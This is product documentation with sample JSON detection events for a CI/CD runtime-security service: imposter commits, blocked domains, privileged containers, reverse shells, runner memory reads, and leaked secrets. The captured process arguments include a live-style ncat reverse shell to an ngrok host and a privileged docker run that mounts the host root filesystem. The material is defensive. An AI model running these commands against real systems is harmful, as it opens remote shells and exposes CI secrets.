Sample Detection Events

Each detection event is streamed in real time with rich metadata about the workflow, job, detection type, and offending artifacts.

S3 and WebHook Integrations

The following detection types are currently supported for both S3 and Webhook integrations. Each example shows a representative payload.

Threat-Intelligence

This will be found in the threat-intel folder for S3

{
  "id": "78540701-3106-4eaa-9408-8902e87bd27d",
  "event_id": "78540701-3106-4eaa-9408-8902e87bd27d",
  "type": "Threat-Intelligence",
  "incident_start_time": "2025-09-15T22:41:00Z",
  "title": "Tinycolor NPM Supply Chain Attack - 40+ Packages Compromised with Credential Harvester",
  "details": "# Tinycolor NPM Supply Chain Attack - 40+ Packages Compromised\n\n## Executive Summary\n\nA malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader supply-chain attack that impacted more than ...",
  "ecosystem": "npm",
  "description": "A malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader supply-chain attack that impacted more than 40 packages spanning...",
  "severity": "HIGH",
  "is_active": "true",
  "incident_url": "https://app.stepsecurity.io/github/your-org/threat-center/incidents/78540701-3106-4eaa-9408-8902e87bd27d"
}

Action-Uses-Commit-From-Non-Default-Branch

{
"id": "Action-Uses-Commit-From-Non-Default-Branch",
"event_id": "94fa7c7b-77a7-4c16-9325-2baadc771914",
"type": "Action-Uses-Commit-From-Non-Default-Branch",
"name": "Action Uses Commit From Non Default Branch",
"owner": "actions-security-demo",
"repo": "actions-security-demo/poc-1",
"workflow_id": "actions-security-demo-actions-security-demo/poc-1-.github-workflows-test-workflow.yaml",
"workflow_path": ".github/workflows/test-workflow.yaml",
"run_id": "14372875584",
"job_id": "40299087623",
"job": "Test",
"timestamp": "1744262248",
"detection": "Action-Uses-Commit-From-Non-Default-Branch-14372875584-40299087623",
"id_timestamp": "Action-Uses-Commit-From-Non-Default-Branch-1744262248",
"html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
"imposter_commit": {
"action": "ashishkurmi/hello-action",
"tag": "main",
"sha": "c5327f7d9d31e29e58e788cb3c2727f773b3d0c4",
"timestamp": "1744262248"
  }
}

Action-Uses-Imposter-Commit

{
  "id": "Action-Uses-Imposter-Commit",
  "event_id": "eb87f08e-1b0c-4de4-bbce-c7232bd7868b",
  "type": "Action-Uses-Imposter-Commit",
  "name": "GitHub Action Uses Imposter Commit",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445268",
  "job": "imposter-commit",
  "timestamp": "1753203994",
  "detection": "Action-Uses-Imposter-Commit-step-security/dummy-compromised-action-c96c327cecdb71e8f031080ba8ad208feb25b13d",
  "id_timestamp": "Action-Uses-Imposter-Commit-1753203994",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "imposter_commit": {
    "action": "step-security/dummy-compromised-action",
    "tag": "v1",
    "sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
    "timestamp": "1753203994",
    "is_imposter_commit": true,
    "is_commit_on_default_branch": false
  },
  "owner_repo": "step-security/poc-workflows"
}

Domain-Blocked

{
  "id": "Domain-Blocked",
  "event_id": "f3843375-0b13-408f-aa81-9bf243049985",
  "type": "Domain-Blocked",
  "event_id": "94fa7c7b-77a7-4c16-9325-2baadc771914",
  "type": "Action-Uses-Commit-From-Non-Default-Branch",
  "name": "Domain Blocked",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445322",
  "endpoint": "0.tcp.us-cal-1.ngrok.io.",
  "timestamp": "1753204032",
  "detection": "Domain-Blocked-0.tcp.us-cal-1.ngrok.io.",
  "id_timestamp": "Domain-Blocked-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

HTTPS-Outbound-Network-Call

{
  "id": "HTTPS-Outbound-Network-Call",
  "event_id": "b0ffece5-7fe4-426a-860e-f2fed217e7e9",
  "type": "HTTPS-Outbound-Network-Call",
  "name": "HTTPS Outbound Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445302",
  "timestamp": "1753204001",
  "detection": "HTTPS-Outbound-Network-Call-POST-api.github.com",
  "method": "POST",
  "host": "api.github.com",
  "path": "/repos/step-security-experiments/github-actions-goat/actions/runners/registration-token",
  "id_timestamp": "HTTPS-Outbound-Network-Call-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

New-Outbound-Network-Call

{
  "id": "New-Outbound-Network-Call",
  "event_id": "0dedfda7-345f-446b-ba93-e213f5569aaf",
  "type": "New-Outbound-Network-Call",
  "name": "New Outbound Network Call",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445257",
  "job": "anomalous-outbound-call",
  "endpoint": "5ad46aa12a0f0fc0.example.com:443",
  "timestamp": "1753204032",
  "detection": "New-Outbound-Network-Call-5ad46aa12a0f0fc0.example.com:443",
  "expected_outbound_connections": [
    "github.com:443",
    "www.google.com:443",
    "goreleaser.com:443",
    "7f6045df5f070c28.example.com:443",
    "f6daed2a23eaf1c1.example.com:443",
    "4baf29081c970e17.example.com:443",
    "98a77cfd80e40ed6.example.com:443",
    "0de402b8ec115cc9.example.com:443"
  ],
  "id_timestamp": "New-Outbound-Network-Call-1753204032",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Privileged-Container

{
  "id": "Privileged-Container",
  "event_id": "8b9ed240-d279-4a48-bfeb-c13937eae9b4",
  "type": "Privileged-Container",
  "name": "Privileged Container Detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753203999",
  "detection": "Privileged-Container-privileged-conatiner",
  "id_timestamp": "Privileged-Container-1753203999",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2489",
      "ppid": "2488",
      "exe": "/usr/bin/docker",
      "working_directory": "/home/runner/work/poc-workflows/poc-workflows",
      "arguments": [
        "docker",
        "run",
        "--privileged",
        "--cap-add=ALL",
        "-v",
        "/:/host",
        "raesene/ncat:latest",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:39.374Z"
    }
  ]
}

Reverse-Shell

{
  "id": "Reverse-Shell",
  "event_id": "22ef2a51-73a3-4aa6-8af3-2810e2f1466d",
  "type": "Reverse-Shell",
  "name": "Reverse shell detected",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445255",
  "job": "privileged-conatiner",
  "timestamp": "1753204005",
  "detection": "Reverse-Shell-privileged-conatiner",
  "id_timestamp": "Reverse-Shell-1753204005",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows",
  "process_events": [
    {
      "pid": "2569",
      "ppid": "2547",
      "exe": "/usr/local/bin/ncat",
      "working_directory": "/",
      "arguments": [
        "/usr/local/bin/ncat",
        "0.tcp.us-cal-1.ngrok.io",
        "17658",
        "-e",
        "/bin/bash"
      ],
      "timestamp": "2025-07-22T17:06:45.265Z"
    }
  ]
}

Runner-Worker-Memory-Read

{
  "id": "Runner-Worker-Memory-Read",
  "event_id": "629abcd1-326b-4828-95d5-9d09789e35f3",
  "type": "Runner-Worker-Memory-Read",
  "name": "Runner Worker Memory Read",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16463564626",
  "job_id": "46535652393",
  "job": "tj-actions-simulation",
  "timestamp": "1753253227",
  "detection": "Runner-Worker-Memory-Read-tj-actions-simulation",
  "id_timestamp": "Runner-Worker-Memory-Read-1753253227",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests",
  "process_events": [
    {
      "pid": "2068",
      "exe": "python3",
      "timestamp": "2025-07-23T06:47:07.869380629Z",
      "armour_event_process": {
        "armour_event_kind": "FILE_READ",
        "timestamp": "2025-07-23T06:47:07.869380629Z",
        "file_info": {
          "is_write": false,
          "current_pid": 2068,
          "current_exe": "python3",
          "target_file": "/proc/1798/mem",
          "target_pid": 1798,
          "target_exe": "Runner.Worker"
        },
        "enforced_protection": false
      }
    }
  ]
}

Secret-In-Build-Log

{
  "id": "Secret-In-Build-Log",
  "event_id": "6489e4cf-8eb1-4a54-917e-51200b7e9991",
  "type": "Secret-In-Build-Log",
  "name": "Secret In Build Log",
  "owner": "step-security",
  "repo": "poc-workflows",
  "workflow_id": "step-security-poc-workflows-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16450863125",
  "job_id": "46495445378",
  "timestamp": "1753204001",
  "detection": "Secret-In-Build-Log-handle-private-key-private-key",
  "secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
  "line_number": "14",
  "rule_id": "private-key",
  "job_name": "handle-private-key",
  "step_number": "5",
  "id_timestamp": "Secret-In-Build-Log-1753204001",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/poc-workflows"
}

Secret-In-Artifact

{
      "id": "Secret-In-Artifact",
      "event_id": "4de78687-8c1d-4b7c-b6ed-a6144e50d31e",
      "type": "Secret-In-Artifact",
      "name": "Secret In Artifact",
      "owner": "harden-runner-canary",
      "repo": "rohan-playground",
      "workflow_id": "harden-runner-canary-rohan-playground-.github-workflows-key.yml",
      "workflow_path": ".github/workflows/key.yml",
      "run_id": "18364110944",
      "job_id": "52313382674",
      "file": "private-key",
      "timestamp": "1759978679",
      "detection": "Secret-In-Artifact-private-key",
      "secret": "----****************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
      "line_number": "0",
      "rule_id": "private-key",
      "job_name": "generate-key",
      "path": "id_ed25519",
      "id_timestamp": "Secret-In-Artifact-1759978679",
      "owner_repo": "harden-runner-canary/rohan-playground",
      "is_suppressed": false,
      "html_url": "https://app.stepsecurity.io/github/harden-runner-canary/rohan-playground/actions/runs/18364110944?runAttempt=1",
      "is_resolved": false,
      "run_attempt": 1
    }

Source-Code-Overwritten

{
  "id": "Source-Code-Overwritten",
  "event_id": "e7d2aa21-110c-4908-927d-3025972eb4af",
  "type": "Source-Code-Overwritten",
  "name": "Source Code Overwritten",
  "owner": "step-security",
  "repo": "armour-tests",
  "workflow_id": "step-security-armour-tests-.github-workflows-poc_workflow.yml",
  "workflow_path": ".github/workflows/poc_workflow.yml",
  "run_id": "16476557099",
  "job_id": "46579649138",
  "job": "source-code",
  "file": "README.MD",
  "timestamp": "1753288775",
  "detection": "Source-Code-Overwritten-README.MD",
  "path": "/home/runner/work/armour-tests/armour-tests/README.MD",
  "id_timestamp": "Source-Code-Overwritten-1753288775",
  "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
  "owner_repo": "step-security/armour-tests"
}

Actions-Policy-Blocked

{
    "id": "Actions-Policy-Blocked",
    "event_id": "47258289-eba8-42c8-86c7-534a46d686b7",
    "type": "Actions-Policy-Blocked",
    "name": "Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Actions-Policy-Blocked-16625207256",
    "id_timestamp": "1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "actions_not_allowed": [
      "step-security/harden-runner@rc-20-int",
      "actions/checkout@v3",
      "step-security/dummy-compromised-action@v1",
      "actions/checkout@v4"
    ]
  }

Runs-On-Policy-Blocked

{
    "id": "Runs-On-Policy-Blocked",
    "event_id": "1ddb24f6-e458-4b6b-8225-a507dce365e4",
    "type": "Runs-On-Policy-Blocked",
    "name": "Runs-On Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Runs-On-Policy-Blocked-16625207256",
    "id_timestamp": "Runs-On-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "runs_on_labels_not_allowed": ["label1", "label2", ...]
  }

Secrets-Policy-Blocked

{
    "id": "Secrets-Policy-Blocked",
    "event_id": "7a212823-d963-44de-9f08-edc5e3d6f6e7",
    "type": "Secrets-Policy-Blocked",
    "name": "Secrets Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Secrets-Policy-Blocked-16625207256",
    "id_timestamp": "Secrets-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "workflow_contains_secrets": "true/false",
    "is_non_default_branch": "true/false",
    "workflow_matches_default_ref": "true/false",
    "current_branch_hash": "[hash]",
    "default_branch_hash": "[hash]"
  }

Compromised-Actions-Policy-Blocked

{
    "id": "Compromised-Actions-Policy-Blocked",
    "event_id": "c4838c86-df31-4258-9577-5cb2538888d0",
    "type": "Compromised-Actions-Policy-Blocked",
    "name": "Compromised Actions Policy Blocked",
    "owner": "step-security",
    "repo": "arm-int-tests",
    "workflow_path": ".github/workflows/poc_workflow_int.yml",
    "run_id": "16625207256",
    "timestamp": "1753885200",
    "detection": "Compromised-Actions-Policy-Blocked-16625207256",
    "id_timestamp": "Compromised-Actions-Policy-Blocked-1753885200",
    "html_url": "https://app.stepsecurity.io/github/step-security/arm-int-tests/actions/runs/16625207256?run_attempt=1",
    "compromised_actions_detected": ["compromised-action1", "compromised-action2", ...]
  }

Lockdown Detection Event

For a lockdown detection event, the is_lockdown key is set to true. Lockdown mode supports the following detection types:

Privileged-Container
Reverse-Shell
Runner-Worker-Memory-Read

{
    "id": "Runner-Worker-Memory-Read",
    "event_id": "3115187a-4882-45bf-8c5c-b1e1a09c66a3",
    "name": "Runner Worker Memory Read",
    "owner": "akurmi-dev-org::without-broker::org-1",
    "repo": "akurmi-test-repo",
    "workflow_id": "akurmi-dev-org::without-broker::org-1-akurmi-test-repo-.github-workflows-runner-worker-2.yml",
    "workflow_path": ".github/workflows/runner-worker-2.yml",
    "run_id": "271",
    "job_id": "100000001",
    "file": "/proc/1970362/mem",
    "timestamp": "1764929166",
    "detection": "Runner-Worker-Memory-Read-LOCKDOWN-build-arc-bottle-mppz9-runner-hw629",
    "job_name": "build",
    "owner_repo": "akurmi-dev-org::without-broker::org-1/akurmi-test-repo",
    "process_events": [
      {
        "pid": "1970792",
        "ppid": "1970786",
        "exe": "/usr/bin/python3",
        "working_directory": "/home/runner/_work/akurmi-test-repo/akurmi-test-repo",
        "arguments": [
          "tj.py"
        ],
        "timestamp": "2025-12-05T10:06:04.98729481Z"
      }
    ],
    "is_suppressed": false,
    "tool": {
      "name": "",
      "sha256": "",
      "parent": null
    },
    "is_resolved": false,
    "is_lockdown": true,
    "customer_id_status": "akurmi-dev-org#Runner-Worker-Memory-Read#new",
    "owner_id_status": "akurmi-dev-org::without-broker::org-1#Runner-Worker-Memory-Read#new",
    "owner_repo_id_status": "akurmi-dev-org::without-broker::org-1#akurmi-test-repo#Runner-Worker-Memory-Read#new"
  }

PreviousTerraform Provider NextMembers

Last updated 10 days ago

Was this helpful?